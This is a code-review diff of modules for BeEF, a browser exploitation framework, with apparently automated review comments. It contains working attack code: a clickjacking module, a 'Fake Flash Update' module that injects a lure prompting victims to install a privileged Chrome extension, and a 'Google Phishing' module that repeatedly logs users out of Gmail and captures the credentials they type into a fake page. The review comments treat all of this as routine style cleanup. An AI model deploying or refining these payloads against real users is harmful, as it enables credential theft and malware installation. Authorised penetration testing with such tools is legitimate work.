configuration = BeEF::Core::Configuration.instance
uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html"
return [
{ 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' },
{ 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' },
{ 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' },
{ 'name' => 'debug', 'type' => 'combobox', 'ui_label' => 'Debug Mode', 'store_type' => 'arraystore', 'store_fields' => ['debug'], 'store_data' => [['true'],['false']], 'valueField' => 'debug', 'value' => 'false', editable: false, 'displayField' => 'debug', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
content = {}
content['clickjack'] = @datastore['clickjack']
save content
end
end
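Review bot: In the `debug` option hash, `editable: false` creates the symbol key `:editable` while every other key in that hash is a string, so a consumer that looks up `'editable'` will not find it. The `key: value` form is also a syntax error on Ruby 1.8. Write it as `'editable' => false` to match the neighbouring entries. How the options are serialised for the UI is outside this file, so the visible effect is inferred.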


@@ -0,0 +1,33 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
// Grab image and payload from config
image = "<%== @image %>";
payload = "<%== @payload %>";
// Add div to page
div = document.createElement('div');
div.setAttribute('id', 'splash');
div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center');
document.body.appendChild(div);
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
$j("#splash").click(function () {
$j(this).hide();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
});
});
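Review bot: `image`, `payload` and `div` are all assigned without `var`, so three generically named globals are written onto the hosting page and can collide with its own variables. Declare them locally: `var image = ...`, `var payload = ...`, `var div = document.createElement('div');`. The `innerHTML` line also concatenates both option values into single-quoted attributes, so a quote character in either value changes the markup that is parsed. Setting `href` and `src` as element properties would avoid depending on the values being quote-free.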


@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
fake_flash_update:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source"
authors: ["mh"]
target:
user_notify: ['ALL']


@@ -0,0 +1,38 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Fake_flash_update < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
return [
{'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
{'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}
]
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'answer' => @datastore['answer']})
end
end
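Review bot: The `payload` option description reads "user is promted to install"; it should be "prompted". `payload` and `image` also repeat the same host-and-port interpolation. Computing it once, `base = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"`, keeps the two defaults in step when the scheme or port handling changes.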

File diff suppressed because one or more lines are too long


@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
gmail_phishing:
enable: true
category: ["Social Engineering"]
name: "Google Phishing"
description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)."
authors: ["floyd @floyd_ch floyd.ch"]
target:
user_notify: ['ALL']


@@ -0,0 +1,50 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Gmail_phishing < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
logout_gmail_interval = 10000
wait_seconds_before_redirect = 1000
return [
{'name' => 'xss_hook_url',
'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.',
'ui_label' => 'XSS hook URI',
'value' => xss_hook_url,
'width' => '300px' }, {
'name' => 'logout_gmail_interval',
'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.',
'ui_label' => 'Gmail logout interval (ms)',
'value' => logout_gmail_interval,
'width' => '100px' }, {
'name' => 'wait_seconds_before_redirect',
'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.',
'ui_label' => 'Redirect delay (ms)',
'value' => wait_seconds_before_redirect,
'width' => '100px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end
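Review bot: `wait_seconds_before_redirect` is named in seconds, but its default of `1000`, its description and its UI label all state milliseconds. The option name is presumably what the command template reads, so either rename it consistently across both files or add a comment next to the assignment, `# value is in milliseconds despite the name`. The option descriptions also contain "loose" (for "lose") and "loged" (for "logged").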